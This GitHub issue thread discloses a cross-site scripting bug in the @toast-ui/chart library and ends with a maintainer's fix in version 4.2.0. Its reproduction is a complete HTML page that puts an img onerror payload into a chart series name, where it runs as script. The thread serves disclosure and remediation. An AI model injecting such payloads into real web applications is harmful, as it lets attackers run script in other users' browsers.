### ISSUE TITLE
Cross-Site Scripting (XSS)

### ISSUE THREAD

**Issue by ready-research** [nhn/tui.chart#573]
**Describe the bug**
`@toast-ui/chart` is vulnerable to `Cross-Site Scripting (XSS)`.

**To Reproduce**
Save and execute the following file in any browser
```
<html>
<head>
      <title>tui-chart</title>
</head>	  
<body>
     
      <link rel="stylesheet" href="https://uicdn.toast.com/chart/latest/toastui-chart.min.css" />
	  <script src="https://uicdn.toast.com/chart/latest/toastui-chart.min.js"></script>
	  <div id="chart-area"></div>
      <script type="text/javascript">   
        const el = document.getElementById('chart-area');
      const data = {
        categories: ['Browser'],
        series: [
          {
            name: 'Chrome"<img src=x onerror=alert(1)>',
            data: 46.02,
          },
          {
            name: 'IE',
            data: 20.47,
          },
          {
            name: 'Firefox',
            data: 17.71,
          },
          {
            name: 'Safari',
            data: 5.45,
          },
          {
            name: 'Opera',
            data: 3.1,
          },
          {
            name: 'Etc',
            data: 7.25,
          },
        ],
      };
      const options = {
        chart: { title: 'Usage share of web browsers', width: 600, height: 400 },
      };
      const chart = toastui.Chart.pieChart({ el, data, options });
    </script>
</body>
</html>
```
XSS payload will get executed.

**Expected behavior**
Display any chart with out execution of any scripts.

**Screenshots**
![tui-chart](https://user-images.githubusercontent.com/72916209/107949888-ef57ac80-6fbb-11eb-94e4-c4e540439245.PNG)

**Desktop:**
 - OS: Windows/Linux
 - Browser [Any browser ex: chrome, safari]
 - Version [All(including latest 4.0.4)]

**Comment by jung-han** [comment]
@ready-research I will fix it! Thank you for the issue!

**Comment by jung-han** [comment]
Fixed in 4.2.0!
https://github.com/nhn/tui.chart/releases/tag/v4.2.0
